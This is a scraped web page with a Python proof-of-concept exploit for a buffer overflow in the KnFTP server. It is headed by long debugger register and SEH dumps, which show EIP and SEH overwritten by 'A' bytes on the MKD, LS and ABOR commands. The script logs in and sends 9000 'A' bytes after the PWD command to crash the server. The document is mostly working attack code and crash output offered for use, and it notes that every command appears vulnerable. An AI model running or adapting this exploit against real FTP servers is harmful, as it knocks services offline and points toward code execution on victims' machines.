扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 |
#!/usr/bin/python # Title: KnFTP Server Buffer Overflow Exploit (DoS PoC) # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Found by: loneferret (kinda) # Bug that made me fuzz this app by Blake: http://www.exploit-db.com/exploits/17819/ # Date Found: Sept 18th 2011 # Tested on: Windows XP SP2/SP3 Professional (DEP off) # Nod to the Exploit-DB Team # Vulnerable commands: MKD / LS / ABOR / CD / APPE / REST / PWD # So it just looks like all this app's commands are vulnerable. Even commands # that the server doesn't support. SEH and/or EIP gets overwriten. # It's almost like this application was made to be vulnerable. # Anyway have fun. #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "MKD" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFE #EIP 77C460C1 msvcrt.77C460C1 #C 0ES 0023 32bit 0(FFFFFFFF) #P 1CS 001B 32bit 0(FFFFFFFF) #A 0SS 0023 32bit 0(FFFFFFFF) #Z 1DS 0023 32bit 0(FFFFFFFF) #S 0FS 003B 32bit 7FFDE000(FFF) #T 0GS 0000 NULL #D 0 #O 0LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0E S P U O Z D I #FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT) #FCW 027FPrec NEAR,53Mask1 1 1 1 1 1 #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "LS" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFF #EIP 77C460C1 msvcrt.77C460C1 #C 0ES 0023 32bit 0(FFFFFFFF) #P 1CS 001B 32bit 0(FFFFFFFF) #A 0SS 0023 32bit 0(FFFFFFFF) #Z 1DS 0023 32bit 0(FFFFFFFF) #S 0FS 003B 32bit 7FFDE000(FFF) #T 0GS 0000 NULL #D 0 #O 0LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0E S P U O Z D I #FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT) #FCW 027FPrec NEAR,53Mask1 1 1 1 1 1 #SEH chain of thread 000001BC, item 0 #Address=00C7FFDC #SE handler=41414141 #EAX 7EFEFEFE #ECX 00C7EFFC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA... #EDX 41414141 #EBX 00C7FE92 ASCII "ABOR" #ESP 00C7CD94 #EBP 00C7CDC4 #ESI 00C7FE9C ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAA... #EDI 00C7FFFD #EIP 77C460C1 msvcrt.77C460C1 #C 0ES 0023 32bit 0(FFFFFFFF) #P 1CS 001B 32bit 0(FFFFFFFF) #A 0SS 0023 32bit 0(FFFFFFFF) #Z 1DS 0023 32bit 0(FFFFFFFF) #S 0FS 003B 32bit 7FFDD000(FFF) #T 0GS 0000 NULL #D 0 #O 0LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty 0.00000000000000000000 #ST1 empty 0.00000000000000000000 #ST2 empty 2.1219957909652723000e-314 #ST3 empty 0.00000000000000000000 #ST4 empty 0.00000000000000000000 #ST5 empty 0.00000000000000000000 #ST6 empty 0.00000000000000000000 #ST7 empty 1.2519775166695107000e-312 # 3 2 1 0E S P U O Z D I #FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT) #FCW 027FPrec NEAR,53Mask1 1 1 1 1 1 import socket buffer = "\x41" * 9000 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS test\r\n') s.recv(1024) s.send('PWD ' + buffer + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close |
体验盒子
